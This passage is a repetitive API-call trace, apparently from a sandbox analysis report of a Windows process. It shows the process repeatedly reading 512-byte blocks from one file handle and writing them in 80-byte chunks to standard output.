_get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] GetFileType (hFile=0x4c) returned 0x1 [0147.424] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.424] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.425] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.425] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] GetFileType (hFile=0x4c) returned 0x1 [0147.425] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.425] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.426] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.426] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.426] GetFileType (hFile=0x4c) returned 0x1 [0147.426] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.427] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.427] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.427] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.427] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] GetFileType (hFile=0x4c) returned 0x1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.428] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.428] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.429] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.429] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.429] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.429] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.430] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.430] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] GetFileType (hFile=0x4c) returned 0x1 [0147.430] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.430] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] GetFileType (hFile=0x4c) returned 0x1 [0147.431] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.431] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.432] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.432] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.432] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.432] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] GetFileType (hFile=0x4c) returned 0x1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] GetFileType (hFile=0x4c) returned 0x1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] GetFileType (hFile=0x4c) returned 0x1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] GetFileType (hFile=0x4c) returned 0x1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] GetFileType (hFile=0x4c) returned 0x1 [0147.432] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.432] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.433] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.433] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] WriteFile (in: hFile=0x4c, lpBuffer=0x14f0b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.433] GetFileType (hFile=0x4c) returned 0x1 [0147.433] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f108*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f108*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] GetFileType (hFile=0x4c) returned 0x1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f158*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f158*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] GetFileType (hFile=0x4c) returned 0x1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1a8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1a8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] GetFileType (hFile=0x4c) returned 0x1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f1f8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f1f8*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] GetFileType (hFile=0x4c) returned 0x1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f248*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f248*, lpNumberOfBytesWritten=0x14e29c*=0x50, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] GetFileType (hFile=0x4c) returned 0x1 [0147.434] _get_osfhandle (_FileHandle=1) returned 0x4c [0147.434] WriteFile (in: hFile=0x4c, lpBuffer=0x14f298*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e29c, lpOverlapped=0x0 | out: lpBuffer=0x14f298*, lpNumberOfBytesWritten=0x14e29c*=0x20, lpOverlapped=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.434] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e288 | out: lpNewFilePointer=0x0) returned 1 [0147.434] _get_osfhandle (_FileHandle=4) returned 0x54 [0147.434] ReadFile (in: hFile=0x54, lpBuffer=0x14f0b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e2a8, lpOverlapped=0x0 | out: lpBuffer=0x14f0b8*, lpNumberOfBytesRead=0x14e2a8*=0x200, lpOverlapped=0x0) returned 1 [0147.435] _get_osfhandle 